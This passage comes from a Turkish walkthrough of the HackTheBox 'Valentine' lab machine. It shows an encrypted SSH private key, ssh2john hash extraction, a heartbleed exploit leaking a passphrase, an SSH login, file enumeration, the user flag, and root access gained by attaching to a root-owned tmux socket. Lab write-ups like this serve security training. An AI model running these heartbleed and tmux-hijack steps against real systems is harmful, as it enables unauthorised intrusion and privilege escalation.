1 T g 9 I p N y I S F C F Y j S q i y G + W U 7 I w K 3 Y U 5 k p 3 C C \n\n d Y S c z 6 3 Q 2 p Q a f x f S b u v 4 C M n N p d i r V K E o 5 n R R f K \/ i a L 3 X 1 R 3 D x V 8 e S Y F K F L 6 p q p u X \n\n c Y 5 Y Z J G A p + J x s n I Q 9 C F y x I t 9 2 f r X z n s j h l Y a 8 s v b V N N f k \/ 9 f y X 6 o p 2 4 r L 2 D y E S p Y \n\n p n s u k B C F B k Z H W N N y e N 7 b 5 G h T V C o d H h z H V F e h T u B r p + V u P q a q D v M C V e 1 D Z C b 4 M j A j \n\n M s l f + 9 x K + T X E L 3 i c m I O B R d P y w 6 e \/ J l Q l V R l m S h F p I 8 e b \/ 8 V s T y J S e + b 8 5 3 z u V 2 q L \n\n s u L a B M x Y K m 3 + z E D I D v e K P N a a W Z g E c q x y l C C \/ w U y U X l M J 5 0 N w 6 J N V M M 8 L e C i i 3 O E W \n\n l 0 l n 9 L 1 b \/ N X p H j G a 8 W H H T j o I i l B 5 q N U y y w S e T B F 2 a w R l X H 9 B r k Z G 4 F c 4 g d m W \/ I z T \n\n R U g Z k b M Q Z N I I f z j 1 Q u i l R V B m \/ F 7 6 Y \/ Y M r m n M 9 k \/ 1 x S G I s k w C U Q + 9 5 C G H J E 8 M k h D 3 \n\n - - - - - E N D   R S A   P R I V A T E   K E Y - - - - -\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Valentine]\n\u2514\u2500# cat convert.py \ndosya = open(&quot;key&quot;)\nkey = dosya.read().split(&quot;\\n&quot;)\ndosya.close()\n\nfor i in key:\n    text = i.replace(&quot; &quot;,&quot;&quot;)\n    if(text != &quot;&quot;):\n        print(text)\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Valentine]\n\u2514\u2500# python3 convert.py\n-----BEGINRSAPRIVATEKEY-----\nProc-Type:4,ENCRYPTED\nDEK-Info:AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46\nDbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R\n5y\/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1\/gjB\/7\/My00Mwx+aI6\n0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi\nEbw66hjFmAu4AzqcM\/kigNRFPYuNiXrXs1w\/deLCqCJ+Ea1T8zlas6fcmhM8A+8P\nOXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd\npHLJpYUII5PuO6x+LS8n1r\/GWMqSOEimNRD1j\/59\/4u3ROrTCKeo9DsTRqs2k1SH\nQdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E\np0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC\nOl6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO\nt9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5\nXqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK\naAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ\n+wQ87lMadds1GQNeGsKSf8R\/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E\nAloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q\nr08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89\/RZ5oSQe\n2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky\ne1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc\/LVjmbhZzKwLhaZRNd8HEM86fNojP\n09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC\ndYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK\/iaL3X1R3DxV8eSYFKFL6pqpuX\ncY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk\/9fyX6op24rL2DyESpY\npnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj\nMslf+9xK+TXEL3icmIOBRdPyw6e\/JlQlVRlmShFpI8eb\/8VsTyJSe+b853zuV2qL\nsuLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC\/wUyUXlMJ50Nw6JNVMM8LeCii3OEW\nl0ln9L1b\/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW\/IzT\nRUgZkbMQZNIIfzj1QuilRVBm\/F76Y\/YMrmnM9k\/1xSGIskwCUQ+95CGHJE8MkhD3\n-----ENDRSAPRIVATEKEY-----\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Valentine]\n\u2514\u2500# cat ssh-key      \n-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46\n\nDbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R\n5y\/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1\/gjB\/7\/My00Mwx+aI6\n0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi\nEbw66hjFmAu4AzqcM\/kigNRFPYuNiXrXs1w\/deLCqCJ+Ea1T8zlas6fcmhM8A+8P\nOXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd\npHLJpYUII5PuO6x+LS8n1r\/GWMqSOEimNRD1j\/59\/4u3ROrTCKeo9DsTRqs2k1SH\nQdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E\np0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC\nOl6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO\nt9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5\nXqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK\naAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ\n+wQ87lMadds1GQNeGsKSf8R\/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E\nAloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q\nr08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89\/RZ5oSQe\n2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky\ne1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc\/LVjmbhZzKwLhaZRNd8HEM86fNojP\n09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC\ndYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK\/iaL3X1R3DxV8eSYFKFL6pqpuX\ncY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk\/9fyX6op24rL2DyESpY\npnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj\nMslf+9xK+TXEL3icmIOBRdPyw6e\/JlQlVRlmShFpI8eb\/8VsTyJSe+b853zuV2qL\nsuLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC\/wUyUXlMJ50Nw6JNVMM8LeCii3OEW\nl0ln9L1b\/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW\/IzT\nRUgZkbMQZNIIfzj1QuilRVBm\/F76Y\/YMrmnM9k\/1xSGIskwCUQ+95CGHJE8MkhD3\n-----END RSA PRIVATE KEY-----\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Valentine]\n\u2514\u2500# ssh 10.10.10.79 -i ssh-key\nEnter passphrase for key &#039;ssh-key&#039;: \n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Valentine]\n\u2514\u2500# \/usr\/share\/john\/ssh2john.py ssh-key\nssh-key:$sshng$1$16$AEB88C140F69BF2074788DE24AE48D46$1200$0db3eb3bbf247a036e9350c0aa500de636e35efd0f3eca20de375b3054bc884f69dd438bd25174c5fecfce6ae40daf11e72fdbe3afbd9c4a4231f4cf84db8945c5b653680970e147fbd4490c10b95093144b5fe08c1ffbfcccb4d0cc31f9a23ad0423449b3985005755b8115ee6f7a42c663af026f9e355a7e6e95b0a6933c11e9ba07004af32acfbe96e9a6d165e5e211bc3aea18c5980bb8033a9c33f92280d4453d8b8d897ad7b35c3f75e2c2a8227e11ad53f3395ab3a7dc9a133c03ef0f39704a35eea5d7b84a693eb0167a7979739a5081ef1e7bcee9270755646b67bd1f7297298a62f5c35dd381d77602219da472c9a585082393ee3bac7e2d2f27d6bfc658ca923848a63510f58ffe7dff8bb744ead308a7a8f43b1346ab3693548741d5b01706976d8c93d6ec403129791eaf4e0f91c9f06d11e8923946f08d5108f0c741484e38cc8e72c8a718ef7eaf84a74803d1473294a9baac266a69cc2749d7475bc5b72f12660b17715b996de5d3e30240584549e5f751120a20f867eb823a5ea32c50f691a38b7eec9e7b47d809bec64ea39eec498c0777c623049d5bc382f0d593930a6373410b6e551aeae94eb7d82b4a8b114c2b19775e0e3edb386cbb292b130c3ac8272a5a17be794f392c12a56cbd5a9eb2f175fcf85e34af19795ea8435018729350b760f3a20ee3ce9cc5da2297b57606f435d0f533d65048d50bc350c70863cfe09492c57ec159d0ca6809d626f160940e2814105503cb803cc7d5d971509e3c144f96cf2c2eb9b45b2da11b53675b92aee6a2dbb9314e72d0fb043cee531a75db3519035e1ac2927fc47faec44a79e29c8a50de3c28de68baadab19e136816d834331b7aaf681bd44025a10ea38394db8f927baae61764fca50658cda7d195a629cf7372a91edb6f81ba6d7e258412c6589f9c993e152bf50af4f2990ec40ad7136763ede5fe6eaeb9eb7e4e27a4ea1db0254d0d51b3d3ee96b4bb2b848b5fb9d8f3dfd1679a1241ed95591c9367515f9e0252b2ff7e31fbf3df8d656f33885a693b59f11c59c1dcd7a9fd57421b48d00b9e34e1bc470f9327b506c7d26ec7fd160b946648070279df44a906546d4e572bb073f2d58e66e16732b02e169944d77c1c433ce9f3688cfd3d9d58d3698b565179344a2d56d36c1bbb53732fed5383d2293722121421588d2aa2c86f9653b2302b7614e64a7708275849ccfadd0da941a7f17d26eebf808c9cda5d8ab54a128e674517cafe268bdd7d51dc3c55f1e49814a14bea9aa9b97718e58649180a7e271b27210f42172c48b7dd9fad7ce7b2386561af2cbdb54d35f93ff5fc97ea8a76e2b2f60f2112a58a67b2e90108506464758d37278dedbe46853542a1d1e1cc75457a14ee06ba7e56e3ea6aa0ef30255ed436426f832302332c95ffbdc4af935c42f789c98838145d3f2c3a7bf2654255519664a116923c79bffc56c4f22527be6fce77cee576a8bb2e2da04cc582a6dfecc40c80ef78a3cd69a59980472ac729420bfc14c945e5309e74370e8935530cf0b7828a2dce116974967f4bd5bfcd5e91e319af161c74e3a088a5079a8d532cb049e4c11766b04655c7f41ae4646e0573881d996fc8cd345481991b31064d2087f38f542e8a5455066fc5efa63f60cae69ccf64ff5c52188b24c02510fbde42187244f0c9210f7\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Valentine]\n\u2514\u2500# \/usr\/share\/john\/ssh2john.py ssh-key &gt; hash\n<\/code><\/pre>\n<p>Daha sonras\u0131nda passphrase'\u0131 k\u0131rmay\u0131 denedim ancak ba\u015far\u0131l\u0131 olamad\u0131m ve <strong>heartbleed<\/strong>'e odkaland\u0131m. Proje sayfas\u0131: <a href=\"https:\/\/github.com\/kudayDOTsite\/heartbleed-poc\">https:\/\/github.com\/kudayDOTsite\/heartbleed-poc<\/a><\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Valentine]\n\u2514\u2500# python2 heartbleed.py 10.10.10.79 -v\n\ndefribulator v1.16\nA tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)\n\n##################################################################\nConnecting to: 10.10.10.79:443, 1 times\nSending Client Hello for TLSv1.0\nWaiting for Server Hello...\nReceived message: type = 22, version = 0x301, length = 66\nReceived message: type = 22, version = 0x301, length = 885\nReceived message: type = 22, version = 0x301, length = 331\nReceived message: type = 22, version = 0x301, length = 4\nReceived Server Hello for TLSv1.0\n\nSending heartbeat request...\nReceived message: type = 24, version = 0x301, length = 16384\nReceived heartbeat response...\n\nWARNING: 10.10.10.79:443 returned more data than it should - server is vulnerable!\nPlease wait... connection attempt 1 of 1\n##################################################################\n\n.@....SC[...r....+..H...9...\n....w.3....f...\n...!.9.8.........5...............\n.........3.2.....E.D.....\/...A.................................I.........\n...........\n...................................#.......0.0.1\/decode.php\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 42\n\n$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==;-...\/..)....7{..~.n\n<\/code><\/pre>\n<p>Denemelerim sonucunda <strong>aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==<\/strong> veriisini yakalad\u0131m ve bunu d\u00f6n\u00fc\u015ft\u00fcr\u00fcdm.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Valentine]\n\u2514\u2500# echo &#039;aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==&#039; | base64 -d      \nheartbleedbelievethehype<\/code><\/pre>\n<p>ssh ile ba\u011fland\u0131m ve ilk flagimi ald\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Valentine]\n\u2514\u2500# ssh hype@10.10.10.79 -i ssh-key                   \nEnter passphrase for key &#039;ssh-key&#039;: \nWelcome to Ubuntu 12.04 LTS (GNU\/Linux 3.2.0-23-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\/\n\nNew release &#039;14.04.5 LTS&#039; available.\nRun &#039;do-release-upgrade&#039; to upgrade to it.\n\nLast login: Fri Feb 16 14:50:29 2018 from 10.10.14.3\nhype@Valentine:~$ whoami\nhype\nhype@Valentine:~$ find \/home -readable -type f -exec ls -al {} \\; 2&gt;\/dev\/null\n-rw-r--r-- 1 hype hype 675 Dec 11  2017 \/home\/hype\/.profile\n-rw------- 1 hype hype 207 Dec 11  2017 \/home\/hype\/.gnome2\/keyrings\/user.keystore\n-rw------- 1 hype hype 105 Dec 11  2017 \/home\/hype\/.gnome2\/keyrings\/login.keyring\n-rw-rw-r-- 1 hype hype 104 Dec 11  2017 \/home\/hype\/.fontconfig\/cabbd14511b9e8a55e92af97fb3a0461-le64.cache-3\n-rw-rw-r-- 1 hype hype 8832 Dec 11  2017 \/home\/hype\/.fontconfig\/e13b20fdb08344e0e664864cc2ede53d-le64.cache-3\n-rw-rw-r-- 1 hype hype 12872 Dec 11  2017 \/home\/hype\/.fontconfig\/7ef2298fde41cc6eeb7af42e48b7d293-le64.cache-3\n-rw------- 1 hype hype 131 Feb 16  2018 \/home\/hype\/.bash_history\n-rw-r--r-- 1 hype hype 220 Dec 11  2017 \/home\/hype\/.bash_logout\n-rw-rw-r-- 1 hype hype 371 Dec 11  2017 \/home\/hype\/.cache\/unity-lens-video\/videos.db\n-rw-rw-r-- 1 hype hype 3683 Dec 11  2017 \/home\/hype\/.cache\/update-manager-core\/meta-release-lts\n-rw-rw-r-- 1 hype hype 541612 Dec 11  2017 \/home\/hype\/.cache\/wallpaper\/0_5_1700_927_792beab7550410d531e55f95b449f135\n-rw-r--r-- 1 hype hype 3072 Dec 11  2017 \/home\/hype\/.cache\/indicator-appmenu\/hud-usage-log.sqlite\n-rw-rw-r-- 1 hype hype 1978 Dec 11  2017 \/home\/hype\/.cache\/unity\/migration_script.log\n-rw------- 1 hype hype 1 Dec 11  2017 \/home\/hype\/.cache\/dconf\/user\n-rw-r--r-- 1 hype hype 0 Dec 11  2017 \/home\/hype\/.cache\/motd.legal-displayed\n-rw-rw-r-- 1 hype hype 71 Dec 11  2017 \/home\/hype\/.cache\/indicators\/messages\/seen-db.keyfile\n-rw-r--r-- 1 hype hype 16384 Dec 11  2017 \/home\/hype\/.cache\/event-sound-cache.tdb.c9052f1b76300a5447f46cc700000004.x86_64-pc-linux-gnu\n-rw-r--r-- 1 hype hype 26 Dec 11  2017 \/home\/hype\/.dmrc\n-rw------- 1 hype hype 0 Dec 11  2017 \/home\/hype\/.Xauthority\n-rw-rw-r-- 1 hype hype 5 Dec 11  2017 \/home\/hype\/.config\/user-dirs.locale\n-rw------- 1 hype hype 632 Dec 11  2017 \/home\/hype\/.config\/user-dirs.dirs\n-rw-rw-r-- 1 hype hype 1152 Dec 11  2017 \/home\/hype\/.config\/dconf\/user\n-rw-rw-r-- 1 hype hype 97 Dec 11  2017 \/home\/hype\/.config\/nautilus\/desktop-metadata\n-rw-rw-r-- 1 hype hype 3031 Dec 11  2017 \/home\/hype\/.config\/Trolltech.conf\n-rw------- 1 hype hype 1024 Dec 11  2017 \/home\/hype\/.local\/share\/zeitgeist\/activity.sqlite\n-rw------- 1 hype hype 281944 Dec 11  2017 \/home\/hype\/.local\/share\/zeitgeist\/activity.sqlite-wal\n-rw------- 1 hype hype 32768 Dec 11  2017 \/home\/hype\/.local\/share\/zeitgeist\/activity.sqlite-shm\n-rw-rw-r-- 1 hype hype 14 Dec 11  2017 \/home\/hype\/.local\/share\/zeitgeist\/fts.index\/position.baseA\n-rw-rw-r-- 1 hype hype 14 Dec 11  2017 \/home\/hype\/.local\/share\/zeitgeist\/fts.index\/termlist.baseB\n-rw-rw-r-- 1 hype hype 16384 Dec 11  2017 \/home\/hype\/.local\/share\/zeitgeist\/fts.index\/record.DB\n-rw-rw-r-- 1 hype hype 28 Dec 11  2017 \/home\/hype\/.local\/share\/zeitgeist\/fts.index\/iamchert\n-rw-rw-r-- 1 hype hype 16384 Dec 11  2017 \/home\/hype\/.local\/share\/zeitgeist\/fts.index\/position.DB\n-rw-rw-r-- 1 hype hype 16384 Dec 11  2017 \/home\/hype\/.local\/share\/zeitgeist\/fts.index\/termlist.DB\n-rw-rw-r-- 1 hype hype 0 Dec 11  2017 \/home\/hype\/.local\/share\/zeitgeist\/fts.index\/flintlock\n-rw-rw-r-- 1 hype hype 14 Dec 11  2017 \/home\/hype\/.local\/share\/zeitgeist\/fts.index\/position.baseB\n-rw-rw-r-- 1 hype hype 14 Dec 11  2017 \/home\/hype\/.local\/share\/zeitgeist\/fts.index\/termlist.baseA\n-rw-rw-r-- 1 hype hype 14 Dec 11  2017 \/home\/hype\/.local\/share\/zeitgeist\/fts.index\/postlist.baseA\n-rw-rw-r-- 1 hype hype 16384 Dec 11  2017 \/home\/hype\/.local\/share\/zeitgeist\/fts.index\/postlist.DB\n-rw-rw-r-- 1 hype hype 14 Dec 11  2017 \/home\/hype\/.local\/share\/zeitgeist\/fts.index\/record.baseB\n-rw-rw-r-- 1 hype hype 14 Dec 11  2017 \/home\/hype\/.local\/share\/zeitgeist\/fts.index\/record.baseA\n-rw-rw-r-- 1 hype hype 14 Dec 11  2017 \/home\/hype\/.local\/share\/zeitgeist\/fts.index\/postlist.baseB\n-rw-r--r-- 1 hype hype 19456 Dec 11  2017 \/home\/hype\/.local\/share\/webkit\/icondatabase\/WebpageIcons.db\n-rw-rw-r-- 1 hype hype 0 Dec 11  2017 \/home\/hype\/.local\/share\/.converted-launchers\n-rw------- 1 hype hype 38 Dec 11  2017 \/home\/hype\/.local\/share\/telepathy\/mission-control\/accounts-goa.cfg\n-rw-rw-r-- 1 hype hype 835 Dec 11  2017 \/home\/hype\/.local\/share\/gsettings-data-convert\n-rw------- 1 hype hype 1766 Dec 13  2017 \/home\/hype\/.ssh\/id_rsa\n-rw------- 1 hype hype 222 Dec 13  2017 \/home\/hype\/.ssh\/known_hosts\n-rw-r--r-- 1 hype hype 397 Dec 13  2017 \/home\/hype\/.ssh\/id_rsa.pub\n-rw------- 1 hype hype 397 Dec 13  2017 \/home\/hype\/.ssh\/authorized_keys\n-rw------- 1 hype hype 115 Dec 11  2017 \/home\/hype\/.gconf\/apps\/update-notifier\/%gconf.xml\n-rw------- 1 hype hype 0 Dec 11  2017 \/home\/hype\/.gconf\/apps\/%gconf.xml\n-rw------- 1 hype hype 384 Dec 11  2017 \/home\/hype\/.gconf\/apps\/update-manager\/%gconf.xml\n-rw------- 1 hype hype 102 Dec 11  2017 \/home\/hype\/.gconf\/apps\/nm-applet\/%gconf.xml\n-rw------- 1 hype hype 0 Dec 11  2017 \/home\/hype\/.gconf\/apps\/gnome-terminal\/%gconf.xml\n-rw------- 1 hype hype 904 Dec 11  2017 \/home\/hype\/.gconf\/apps\/gnome-terminal\/profiles\/Default\/%gconf.xml\n-rw------- 1 hype hype 0 Dec 11  2017 \/home\/hype\/.gconf\/apps\/gnome-terminal\/profiles\/%gconf.xml\n-rw-r--r-- 1 root root 39 Dec 13  2017 \/home\/hype\/.tmux.conf\n-rw------- 1 hype hype 21 Dec 11  2017 \/home\/hype\/.mission-control\/accounts\/accounts.cfg\n-rw------- 1 hype hype 12173 Dec 11  2017 \/home\/hype\/.xsession-errors\n-rw------- 1 hype hype 636 Dec 11  2017 \/home\/hype\/.ICEauthority\n-rw-r--r-- 1 hype hype 696 Dec 11  2017 \/home\/hype\/.pulse\/c9052f1b76300a5447f46cc700000004-card-database.tdb\n-rw-r--r-- 1 hype hype 12288 Dec 11  2017 \/home\/hype\/.pulse\/c9052f1b76300a5447f46cc700000004-device-volumes.tdb\n-rw-r--r-- 1 hype hype 10 Dec 11  2017 \/home\/hype\/.pulse\/c9052f1b76300a5447f46cc700000004-default-sink\n-rw-r--r-- 1 hype hype 18 Dec 11  2017 \/home\/hype\/.pulse\/c9052f1b76300a5447f46cc700000004-default-source\n-rw-r--r-- 1 hype hype 696 Dec 11  2017 \/home\/hype\/.pulse\/c9052f1b76300a5447f46cc700000004-stream-volumes.tdb\n-rw-rw-r-- 1 hype hype 132 Dec 11  2017 \/home\/hype\/.gtk-bookmarks\n-rw-rw-r-- 1 hype hype 33 Dec 13  2017 \/home\/hype\/Desktop\/user.txt\n-rw------- 1 hype hype 256 Dec 11  2017 \/home\/hype\/.pulse-cookie\n-rw-rw-r-- 1 hype hype 463 Dec 11  2017 \/home\/hype\/.dbus\/session-bus\/c9052f1b76300a5447f46cc700000004-0\n-rw-r--r-- 1 hype hype 3486 Dec 11  2017 \/home\/hype\/.bashrc\n-rw------- 1 hype hype 9659 Dec 11  2017 \/home\/hype\/.xsession-errors.old\nhype@Valentine:~$ \nhype@Valentine:~$ cat \/home\/hype\/Desktop\/user.txt\ne6710a5464769fd5fcd216e076961750<\/code><\/pre>\n<p>Daha sonras\u0131nda i\u00e7eridei enum yapmak i\u00e7in \u00e7e\u015fitli scriptler kulland\u0131m. \/linpeas.sh i\u015fimi \u00e7\u00f6zd\u00fc. Linpeas \u00e7\u0131kt\u0131s\u0131nda dikkat \u00e7ekici nokta a\u015fa\u011f\u0131da:<\/p>\n<pre><code class=\"language-sh\">\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Cleaned processes\n\u255a Check weird &amp; unexpected proceses run by root: https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation#processes\nroot          1  0.0  0.2  24432  2420 ?        Ss   Aug11   0:00 \/sbin\/init\nroot        302  0.0  0.0  17224   636 ?        S    Aug11   0:00 upstart-udev-bridge --daemon[0m\nroot        307  0.0  0.1  22008  1784 ?        Ss   Aug11   0:00 \/sbin\/udevd --daemon[0m\nroot        540  0.0  0.1  22004  1264 ?        S    Aug11   0:00  _ \/sbin\/udevd --daemon[0m\nroot       1085  0.0  0.1  22004  1268 ?        S    Aug11   0:00  _ \/sbin\/udevd --daemon[0m\nsyslog      553  0.0  0.1 249464  1500 ?        Sl   Aug11   0:01 rsyslogd -c5\n102         566  0.0  0.1  24072  1248 ?        Ss   Aug11   0:00 dbus-daemon[0m --system --fork --activation=upstart\nroot        588  0.0  0.3  79036  3208 ?        Ss   Aug11   0:00 \/usr\/sbin\/modem-manager\nroot        608  0.0  0.1  21180  1720 ?        Ss   Aug11   0:00 \/usr\/sbin\/bluetoothd\navahi       622  0.0  0.0  32172   468 ?        S    Aug11   0:00  _ avahi-daemon[0m: chroot helper\nroot        630  0.0  0.6 174448  6624 ?        Ssl  Aug11   0:00 NetworkManager\nroot        641  0.0  0.3 104088  3948 ?        Ss   Aug11   0:00 \/usr\/sbin\/cupsd -F\nroot        748  0.0  0.0  15180   396 ?        S    Aug11   0:00 upstart-socket-bridge --daemon[0m\nroot        817  0.0  0.3 203500  3896 ?        Sl   Aug11   0:00 \/usr\/lib\/policykit-1\/polkitd --no-debug\nroot        922  0.0  0.2  49952  2848 ?        Ss   Aug11   0:00 \/usr\/sbin\/sshd -D\nhype       4887  0.0  0.1  92372  1668 ?        S    02:07   0:00      _ sshd: hype@pts\/0    \nhype       4888  0.2  0.8  31604  8684 pts\/0    Ss   02:07   0:00          _ -bash\nhype       5104  0.1  0.1   5096  1456 pts\/0    S+   02:09   0:00              _ \/bin\/sh .\/linpeas.sh -a\nhype       6141  0.0  0.1   5096  1028 pts\/0    S+   02:09   0:00                  _ \/bin\/sh .\/linpeas.sh -a\nhype       6145  0.0  0.1  22464  1228 pts\/0    R+   02:09   0:00                  |   _ ps fauxwww\nhype       6144  0.0  0.0   5096   856 pts\/0    S+   02:09   0:00                  _ \/bin\/sh .\/linpeas.sh -a\nroot       1011  0.0  0.0  19976   968 tty4     Ss+  Aug11   0:00 \/sbin\/getty -8 38400 tty4\nroot       1020  0.0  0.0  19976   976 tty5     Ss+  Aug11   0:00 \/sbin\/getty -8 38400 tty5\nroot       1026  0.0  0.0  19976   972 tty2     Ss+  Aug11   0:00 \/sbin\/getty -8 38400 tty2\nroot       1027  0.0  0.0  19976   976 tty3     Ss+  Aug11   0:00 \/sbin\/getty -8 38400 tty3\nroot       1029  0.0  0.1  26416  1676 ?        Ss   Aug11   0:13 \/usr\/bin\/tmux -S \/.devs\/dev_sess\nroot       1033  0.0  0.4  20652  4588 pts\/18   Ss+  Aug11   0:00  _ -bash\nroot       1038  0.0  0.0  19976   972 tty6     Ss+  Aug11   0:00 \/sbin\/getty -8 38400 tty6\nroot       1058  0.0  0.0   4452   812 ?        Ss   Aug11   0:00 acpid -c \/etc\/acpi\/events -s \/var\/run\/acpid.socket\nroot       1059  0.0  0.1  19104  1036 ?        Ss   Aug11   0:00 cron\ndaemon[0m     1060  0.0  0.0  16900   384 ?        Ss   Aug11   0:00 atd\nwhoopsie   1066  0.0  0.5 203064  5548 ?        Ssl  Aug11   0:00 whoopsie\nroot       1114  0.0  0.4 162284  4320 ?        Sl   Aug11   0:29 \/usr\/bin\/vmtoolsd\nroot       1286  0.0  1.0 113124 10904 ?        Ss   Aug11   0:01 \/usr\/sbin\/apache2 -k start\nwww-data   2582  0.0  0.8 113864  8488 ?        S    Aug11   0:00  _ \/usr\/sbin\/apache2 -k start\nwww-data   2583  0.0  0.8 113864  8488 ?        S    Aug11   0:00  _ \/usr\/sbin\/apache2 -k start\nwww-data   2584  0.0  0.8 113864  8484 ?        S    Aug11   0:00  _ \/usr\/sbin\/apache2 -k start\nwww-data   2585  0.0  0.8 113868  8480 ?        S    Aug11   0:00  _ \/usr\/sbin\/apache2 -k start\nwww-data   2586  0.0  0.8 113864  8492 ?        S    Aug11   0:00  _ \/usr\/sbin\/apache2 -k start\nwww-data   3825  0.0  0.8 113864  8460 ?        S    Aug11   0:00  _ \/usr\/sbin\/apache2 -k start\nroot       1457  0.0  0.0  19976   976 tty1     Ss+  Aug11   0:00 \/sbin\/getty -8 38400 tty1\nroot       1614  0.0  1.0  66916 10296 ?        S    Aug11   0:00 \/usr\/lib\/vmware-vgauth\/VGAuthService -s\nroot       1649  0.0  0.5 510124  5464 ?        Sl   Aug11   0:14 \/\/usr\/lib\/vmware-caf\/pme\/bin\/ManagementAgentHost\nroot       1677  0.0  0.3 584296  3892 ?        Sl   Aug11   0:00 \/usr\/sbin\/console-kit-daemon[0m --no-daemon<\/code><\/pre>\n<p>G\u00f6r\u00fcld\u00fc\u011f\u00fc \u00fczere <strong>tmux<\/strong>'da aktik bir session var. Ayr\u0131ca root haklar\u0131nda...<\/p>\n<pre><code class=\"language-sh\">hype@Valentine:\/tmp$ tmux -S \/.devs\/dev_sess\n\nroot@Valentine:\/tmp# id\nuid=0(root) gid=0(root) groups=0(root)\nroot@Valentine:\/tmp# cd \/root\/\nroot@Valentine:~# ls\ncurl.sh  root.txt\nroot@Valentine:~# 